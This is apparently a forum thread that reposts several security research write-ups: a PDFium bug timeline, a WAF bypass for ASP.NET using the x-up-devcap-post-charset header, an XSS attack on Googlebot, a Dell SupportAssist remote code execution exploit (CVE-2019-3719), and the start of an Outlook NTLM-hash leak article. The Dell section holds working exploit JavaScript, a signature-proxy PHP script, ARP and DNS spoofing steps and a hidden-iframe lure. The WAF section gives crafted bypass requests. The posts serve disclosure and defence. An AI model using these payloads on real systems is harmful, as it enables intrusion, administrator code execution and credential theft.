    More than three years of functional discussion once again accidentally killed the bug.

    A non-security update from Chrome last month unexpectedly fixed this vulnerability in section #6. The reason is:

    after a series of performance tests passed, Chrome removed the CFX_FixedBufGrow type and replaced it with std::vector. For more information, please refer to link .

    nice work, Google Chrome Team :)

    027A0BBB068E3C551C0F0087C7DCED0F.jpg

    Figure 13

    8. Vulnerability Reporting Timeline

    2018-04-17 submit bug issue

    2018-04-18 issue fixed

    2018-04-19 issue closed

    2018-05-10 Google credited to Qihoo 360 Vulcan Team

    Ref:

    [1] https://www.chromium.org/Home/chromium-security/pdfium-security

    [2] https://bugs.chromium.org/p/pdfium/issues/detail?id=177

    [3] https://bugs.chromium.org/p/chromium/issues/detail?id=833721

    [4] https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop.html

    本文链接:http://blogs.360.cn/post/google-chrome-pdfium-shading-drawing-integer-overflow-lead-to-rce.html

    -- EOF --

    作者 admin001 发表于 2018-07-16 09:40:16 ,添加在分类 Browser Security Vulnerability Analysis 下 ,最后修改于 2018-08-24 08:36:43

     

    Sursa: http://blogs.360.cn/post/google-chrome-pdfium-shading-drawing-integer-overflow-lead-to-rce.html

  10. x-up-devcap-post-charset Header in ASP.NET to Bypass WAFs Again!

    In the past, I showed how the request encoding technique can be abused to bypass web application firewalls (WAFs). The generic WAF solution to stop this technique has been implemented by only allowing whitelisted charset via the Content-Type header or by blocking certain encoding charsets. Although WAF protection mechanisms can normally be bypassed by changing the headers slightly, I have also found a new header in ASP.NET that can hold the charset value which should bypass any existing protection mechanism using the Content-Type header.

    Let me introduce to you, the one and only, the x-up-devcap-post-charset header that can be used like this:

    POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1
    Host: target
    User-Agent: UP foobar
    Content-Type: application/x-www-form-urlencoded
    x-up-devcap-post-charset: ibm500
    Content-Length: 40
     
    %89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7

    As it is shown above, the Content-Type header does not have the charset directive and the x-up-devcap-post-charset header holds the encoding’s charset instead. In order to tell ASP.NET to use this new header, the User-Agent header should start with UP!

    The parameters in the above request were create by the Burp Suite HTTP Smuggler, and this request is equal to:

    POST /testme87/a.aspx?HelloWorld= HTTP/1.1
    Host: target
    User-Agent: UP foobar
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 14
    
    input1=xxxxxxx

    I found this header whilst I was looking for something else inside the ASP.NET Framework. Here is how ASP.NET reads the content encoding before it looks at the charset directive in the Content-Type header:

    https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362

    if (UserAgent!=null &amp;&amp; CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
        string postDataCharset = Headers["x-up-devcap-post-charset"];
        if (postDataCharset!=null &amp;&amp; postDataCharset.Length>0) {
            try {
                return Encoding.GetEncoding(postDataCharset);

    Or

    https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905

    if (UserAgent != null &amp;&amp; CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
        String postDataCharset = Headers["x-up-devcap-post-charset"];
        if (!String.IsNullOrEmpty(postDataCharset)) {
            try {
                return Encoding.GetEncoding(postDataCharset);

    I should admit that the original technique still works on most of the WAFs out there as they have not taken the request encoding bypass technique seriously ;) However, the OWASP ModSecurity Core Rule Set (CRS) quickly created a simple rule for it at the time which they are going to improve in the future. Therefore, I disclosed this new header to Christian Folini (@ChrFolini) from CRS to create another useful rule before releasing this blog post. The pull request for the new rule is pending at https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392.

    References:
    https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/
    https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
    https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/
    https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
    https://github.com/nccgroup/BurpSuiteHTTPSmuggler/

    This entry was posted in Security Articles and tagged ASP.NET, request encoding, waf, WAF bypass, x-up-devcap-post-charset on May 4, 2019.  

    Sursa: https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/

  11. XSS attacks on Googlebot allow search index manipulation

    Short version:

    Googlebot is based on Google Chrome version 41 (2015), and therefore it has no XSS Auditor, which later versions of Chrome use to protect the user from XSS attacks. Many sites are susceptible to XSS Attacks, where the URL can be manipulated to inject unsanitized Javascript code into the site.

    Since Googlebot executes Javascript, this allows an attacker to craft XSS URLs that can manipulate the content of victim sites. This manipulation can include injecting links, which Googlebot will follow to crawl the destination site. This presumably manipulates PageRank, but I’ve not tested that for fear of impacting real sites rankings.

    I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), and therefore I’m publishing details such that site owners and companies can defend their own sites from this sort of attack. Google have now told me they do not have immediate plans to remedy this.

     

    Last year I published details of an attack against Google’s handling of XML Sitemaps, which allowed an attacker to ‘borrow’ PageRank from other sites and rank illegitimate sites for competitive terms in Google’s search results. Following that, I had been investigating other potential attack when my colleague at Distilled, Robin Lord, mentioned the concept of Javascript injection attacks which got me thinking.

    XSS Attacks

    There are various types of cross-site scripting (XSS) attack; we are interested in the situation where Javascript code inside the URL is included inside the content of the page without being sanitized. This can result in the Javascript code being executed in the user’s browser (even though the code isn’t intended to be part of the site). For example, imagine this snippet of PHP code which is designed to show the value of the page URL parameter:

    php_code.png

    If someone was to craft a malicious URL where instead of a number in the page parameter they instead put a snippet of Javascript:

    https://foo.com/stores/?page=<script>alert('hello')</script>

    Then it may produce some HTML with inline Javascript, which the page authors had never intended to be there:

    injected_javascript.png

    That malicious Javascript could do all sorts of evil things, such as steal data from the victim page, or trick the user into thinking the content they are looking at is authentic. The user may be visiting a trusted domain, and therefore trust the contents of the page, which are being manipulated by a hacker.

    Chrome to the rescue

    It is for that reason that Google Chrome has an XSS Auditor, which attempts to identify this type of attack and protect the user (by refusing to load the page):

    xss_auditor.png

    So far, so good.

    Googlebot = Chrome 41

    Googlebot is currently based on Chrome version 41, which we know from Google’s own documentation. We also know that for the last couple of years Google have been promoting the fact that Googlebot executes and indexes Javascript on the sites it crawls. Chrome 41 had no XSS Auditor (that I’m aware of, it certainly doesn’t block any XSS that I’ve tried), and therefore my theory was that Googlebot likely has no XSS Auditor.

    So the first step was to check, whether Googlebot (or Google’s Website Rendering Service [WRS], to be more precise) would actually render a URL with an XSS attack. One of my early tests was on the startup bank, Revolut — a 3 year old fintech startup with $330M in funding having XSS vulnerabilities demonstrates the breadth of the XSS issue (they’ve now fixed this example).

    I used Google’s Mobile Friendly Tool to render the page, which quickly confirms Google’s WRS executes the XSS Javascript, in this case I’m crudely injecting a link at the top of the page:

    revolut_link.png

    It is often (as in the case with Revolut) possible to entirely replace the content of the page to create your own page and content, hosted on the victim domain.

    Content + links are cached

    I submitted a test page to the Google index, and then examining the cache of these pages shows that the link being added to the page does appear in the Google index:

    google_cache-1.png

    Canonicals

    A second set of experiments demonstrated (again via the mobile friendly tool) that you can change the canonicals on pages:

    canonical.png

    Which I also confirmed via Google’s URL Inspector Tool, which reports the injected canonical as the true canonical (h/t to Sam Nemzer for the suggestion):

    canonical_2.png

    Links are crawled and considered

    At this point, I had confirmed that Google’s WRS is susceptible to XSS attacks, and that Google were crawling the pages, executing the Javascript, indexing the content and considering the search directives within (i.e. the canonicals). The next important stage, is does Google find links on these pages and crawl them. Placing links on other sites is the backbone of the PageRank algorithm and a key factor for how sites rank in Google’s algorithm.

    To test this, I crafted a page on Revolut which contained a link to a page on one of my test domains which I had just created moments before, and had previously not existed. I submitted the Revolut page to Google and later on Googlebot crawled the target page on my test domain. The page later appeared in the Google search results:

    revolut_indexation.png

    This demonstrated that Google was identifying and crawling injected links. Furthermore, Google confirms that Javascript links are treated identically to HTML links (thanks Joel Mesherghi😞

    google_links.png

    All of this demonstrates that there is potential to manipulate the Google search results. However, I was unsure how to test this without actually impacting legitimate search results, so I stopped where I was (I asked Google for permission to do this in a controlled fashion a few days back, but not had an answer just yet).

    How could this be abused?

    The obvious attack vector here is to inject links into other websites to manipulate the search results – a few links from prominent sites can make a very dramatic difference to search performance. The https://www.openbugbounty.org/ lists more than 125,000 un-patched XSS vulnerabilities. This included 260 .gov domains, 971 .edu domains, and 195 of the top 500 domains (as ranked by the Majestic Million top million sites.

    A second attack vector is to create malicious pages (maybe redirecting people to a malicious checkout, or directing visitors to a competing product) which would be crawled and indexed by Google. This content could even drive featured snippets and appear directly in the search results. Firefox doesn’t yet have adequate XSS protection, so this pages would load for Google users searching with Firefox.

    Defence

    The most obvious way to defend against this is to take security seriously and try to ensure you don’t have XSS vulnerabilities on your site. However, given then numbers from OpenBugBounty above, it is clear that that is more difficult that it sounds – which is the exact reason that Google added the XSS Auditor to Chrome!

    One quick thing you can do is check your server logs and search for URLs that have terms such as ‘script’ in them, indicating a possible XSS attempt.

    Wrap up

    This exploit is a combination of existing issues, but combine to form an zero-day exploit that has potential to be very harmful for Google users. I reported the issue to Google back on November 2018, but they have not confirmed the issue from their side or made any headway addressing it. They cited “difficulties in communication with the team investigating”, which felt a lot like what happened during the report of XML Sitemaps exploit.

    My impression is that if a security issue affects a not commonly affected part of Google, then the internal lines of communication are not well oiled. It was March when I got the first details, when Google let me know “that our existing protection mechanisms should be able to prevent this type of abuse but the team is still running checks to validate this” – which didn’t agree with the evidence. I re-ran some of my tests and didn’t see a difference. The security team themselves were very responsive, as usual, but seemingly had no way to move things forward unfortunately.

    It was 140 days after the report when I let Google know I’d be publicly disclosing the vulnerability, given the lack of movement and the fact that this could already be impacting both Google search users, as well as website owners and advertisers. To their credit, Google didn’t attempt to dissuade me and asked me to simply to use my best judgement in what I publish.

    If you have any questions, comments or information you can find me on Twitter at @TomAnthonySEO, or if you are interested in consulting for technical/specialised SEO, you can contact me via Distilled.

    Disclosure Timeline

    • 3rd November 2018 – I filed the initial bug report.
    • Over the next few weeks/months we went back and forth a bit.
    • 11th February 2019 – Google responded letting me know they were “surfacing some difficulties in communication with the team investigating”
    • 17th April 2018 – Google confirmed they have no immediate plans to fix this. I believe this is probably because they are preparing to release a new build of Googlebot shortly (I wonder if this was why the back and forth was slow – they were hoping to release the update?)

     

    Sursa: http://www.tomanthony.co.uk/blog/xss-attacks-googlebot-index-manipulation/

  12. Remote Code Execution on most Dell computers

    What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is “What third-party software came with my PC?”. In this article, I’ll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to “proactively check the health of your system’s hardware and software” and which is “preinstalled on most of all new Dell devices”.

    Discovery

    Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn’t cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell’s G3 15 laptop. I decided to upgrade my laptop’s 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell’s support site, I was prompted with an interesting option.

    Support Page

    “Detect PC”? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

    SupportAssist Download Prompt

    A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn’t installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

    Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find.

    Download Drivers

    I opened the Chrome Web Inspector and the Network tab then pressed the “Detect Drivers” button.

    Network Tab

    The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

    On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

    POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/json
    Origin: https://www.dell.com
    Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    

    The body:

    [
        {
        "title":"Dell G3 3579 and 3779 System BIOS",
        "category":"BIOS",
        "name":"G3_3579_1.9.0.exe",
        "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
        "isSecure":false,
        "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
        "run":false,
        "restricted":false,
        "fileId":"198393521",
        "fileSize":"13 MB",
        "checkedStatus":false,
        "fileStatus":-99,
        "driverId":"4WW45",
        "path":"",
        "dupInstallReturnCode":"",
        "cssClass":"inactive-step",
        "isReboot":true,
        "DiableInstallNow":true,
        "$$hashKey":"object:175"
        }
    ]
    

    It seemed like the web client could make direct requests to the SupportAssistAgent service to “download and manually install” a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

    On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

    ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

    An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

    // Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
    public static bool ValidateDomain(Uri request, Uri urlReferrer)
    {
    	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
    }
    
    // Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
    public static bool ValidateDomain(string domain)
    {
    	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
    }
    

    The issue with the function above is the fact that it really isn’t a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

    1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
    2. Find a Subdomain Takeover vulnerability
    3. Make the request from a local program
    4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

    In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

    When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console.

    At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

    1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
    2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
    3. The SupportAssist client then responds when the right service port is reached, with a style like this:
      {
       "isAlive": true,
       "clientVersion": "[CLIENT VERSION]",
       "requiredVersion": null,
       "success": true,
       "data": null,
       "localTime": [EPOCH TIME],
       "Exception": {
           "Code": null,
           "Message": null,
           "Type": null
       }
      }
      
    4. Once the browser sees this, it continues with further requests using the now determined service port.

    Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.

    Here are the methods the agent exposes:

    clientservice_getdevicedrivers - Grabs available updates.
    diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
    downloadservice_downloadfiles - Downloads a JSON array of files.
    clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
    clientservice_getservicetag - Grabs the service tag.
    localclient_img - Connects to SignalR (Dell Hardware Support).
    diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
    clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
    diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
    downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
    diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
    diagnosticsservice_launchtool - Launches a diagnostic tool.
    diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
    downloadservice_createiso - Download an ISO.
    clientservice_checkadminrights - Check if the Agent privileged.
    diagnosticsservice_performinstallation - Update SupportAssist.
    diagnosticsservice_rebootsystem - Reboot system.
    clientservice_getdevices - Grab system devices.
    downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
    diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
    downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
    downloadservice_createbootableiso - Download bootable iso.
    diagnosticsservice_isalive - Heartbeat check.
    downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
    clientservice_getscanresults - Gets driver scan results.
    downloadservice_restartsystem - Restarts the system.
    

    The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically.

    1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
    2. The browser sends a request with the following JSON structure:
      [
       {
       "title":"DOWNLOAD TITLE",
       "category":"CATEGORY",
       "name":"FILENAME",
       "location":"FILE URL",
       "isSecure":false,
       "fileUniqueId":"RANDOMUUID",
       "run":true,
       "installOrder":2,
       "restricted":false,
       "fileStatus":-99,
       "driverId":"DRIVER ID",
       "dupInstallReturnCode":0,
       "cssClass":"inactive-step",
       "isReboot":false,
       "scanPNPId":"PNP ID",
       "$$hashKey":"object:210"
       }
      ] 
      
    3. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
    4. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
    5. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
      if (service_Method == "downloadservice_downloadandautoinstall")
      {
       string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
       result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
      } 
      

      Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.

    6. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson.
    7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:
      foreach (File file in list)
      {
       bool flag2 = file.Location.ToLower().StartsWith("http://");
       if (flag2)
       {
           file.Location = file.Location.Replace("http://", "https://");
       }
       bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
       if (flag3)
       {
           DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
           throw new InvalidFileException();
       }
      }
      DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);
      

    The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

    public static bool CheckDomain(string fileLocation)
    {
    	List<string> list = new List<string>
    	{
    		"ftp.dell.com",
    		"downloads.dell.com",
    		"ausgesd4f1.aus.amer.dell.com"
    	};
    	
    	return list.Contains(new Uri(fileLocation.ToLower()).Host);
    } 
    
    1. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator.

    This is enough information we need to start writing an exploit.

    Exploitation

    The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript.

    First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

    This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers!

    The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

    <?php
    header('Access-Control-Allow-Origin: *');
    echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
    ?> 
    

    The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

    Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

    function FindServer() {
    	ports.forEach(function(port) {
    		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
    		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
    	});
    } 
    

    After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload.

    Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either “ftp.dell.com”, “downloads.dell.com”, or “ausgesd4f1.aus.amer.dell.com”. I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack.

    If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

    The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone.

    I made a function that automated sending the payload:

    function SendRCEPayload() {
    	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
    
    	var xmlhttp = new XMLHttpRequest();
    	xmlhttp.open("POST", auto_install_url, true);
    
    	var files = [];
    	
    	files.push({
    	"title": "SupportAssist RCE",
    	"category": "Serial ATA",
    	"name": "calc.EXE",
    	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
    	"isSecure": false,
    	"fileUniqueId": guid(),
    	"run": true,
    	"installOrder": 2,
    	"restricted": false,
    	"fileStatus": -99,
    	"driverId": "FXGNY",
    	"dupInstallReturnCode": 0,
    	"cssClass": "inactive-step",
    	"isReboot": false,
    	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
    	"$$hashKey": "object:210"});
    	
    	xmlhttp.send(JSON.stringify(files)); 
    }
    

    Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker’s machine):

    1. Grab the interface IP address for the specified interface.
    2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
    3. To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we’re the router and an ARP packet to the router telling it that we’re the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
    4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
    5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

    You can read Dell’s advisory here.

    Demo

    Here’s a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

    The source code of the dellrce.html file featured in the video is:

    <h1>CVE-2019-3719</h1>
    <h1>Nothing suspicious here... move along...</h1>
    <iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>
    

    Timeline

    10/26/2018 - Initial write up sent to Dell.

    10/29/2018 - Initial response from Dell.

    11/22/2018 - Dell has confirmed the vulnerability.

    11/29/2018 - Dell scheduled a “tentative” fix to be released in Q1 2019.

    01/28/2019 - Disclosure date extended to March.

    03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

    04/18/2019 - Vulnerability disclosed as an advisory.

    Written on April 30, 2019

     

    Sursa: https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/

  13. Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook

    ntlm, security, red team — 03 July 2018

    fisherman-for-blog.jpg

    Introduction

    A few months ago Will Dormann of CERT/CC published a blog post [1] describing a technique where an adversary could abuse Microsoft Outlook together with OLE objects, a feature of Microsoft Windows since its early days, to force the operating system to leak Net-NTLM hashes.

    Last year we wrote a blog post [2] that touched the subject of NTLM hash leakage via a different angle, by abusing common web application vulnerabilities such as Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) to achieve the same goals and obtain the precious hashes we all love and cherish. We recommend reading the post we published previously before continuing unless you are familiar with how Windows single sign-on authenticates itself in corporate networks.

    Here in Blaze Information Security we have been using for a while, with a high success rate, a similar technique to force MS Outlook to give out NTLM hashes with little to no interaction other than reading a specially-crafted e-mail message. Just recently, while we were writing this blog post, NCC Group published [5] in their blog an article describing the same technique we have been using along with other details, so we decided to publish ours explaining the approach we use and how to mitigate the risk presented by this issue.

    A brief history of SMB-to-NTLM hashes attacks

    In a post to Bugtraq mailing list in March 1997 (yes, 21 years ago) Aaron Spangler wrote about a vulnerability [3] in versions of Internet Explorer and Netscape Navigator that worked by embedding an tag with the 'src' value of an SMB share instead of a HTTP or HTTPS page. This would force Windows to initiate an NTLM authentication with a modified SMB server that could fetch the user's Net-NTLM hashes.

    Interestingly, Aaron's Bugtraq post also hinted about a theoretical flaw in the authentication protocol what would become later known as SMBRelay attacks but they emerged only a few years later.

    Fast forward to 2016, a Russian security researcher named ValdikSS wrote [6] on Medium what seems to have been a modern replica of the same experiment Spangler did 19 years ago, with little to no modification from the original attack vector.

    Abusing Microsoft Outlook to steal Net-NTLM hashes

    Rather than using the CERT/CC technique - taking advantage of the possibility to embed OLE objects inside a RTF, DOC or PDF, which may make security software integrated with the e-mail server to raise their eye brows, this technique exploits Outlook's handling of HTML messages with images and the behavior described in the Bugtraq post of 1997. HTML e-mails with embedded images are very popular, especially in corporate environments, and are less likely to be screened or blocked by anti-virus software and e-mail gateways.

    The Net-NTLM hashes will be leaked via SMB traffic to an external rogue SMB server, like Responder (our tool of choice for the demo), Core Security's Impacket smbrelay or ntlmrelay or even a custom SMB server.

    In a nutshell, the attack works by sending an e-mail to victim in HTML format, with an image pointing to an external SMB server. The image can be, for example, a HTML-based e-mail signature. The client will automatically initiate a NTLM authentication against the rogue server, ultimately leaking its hashes.

    From a victim's perspective in some cases depending on how Outlook is configured to render images in HTML e-mails, there may be an alert about opening external content and this may hint an abnormal behavior. Nevertheless, this is a common occurrence for many Outlook users to have to click through a warning to render an image, so this does not pose a strong obstacle for this exploitation vector. Sometimes we have also noticed a very quick pop-up before fetching content from the remote SMB server in slower connections, also a regular occurrence that is unlikely to raise suspicion.

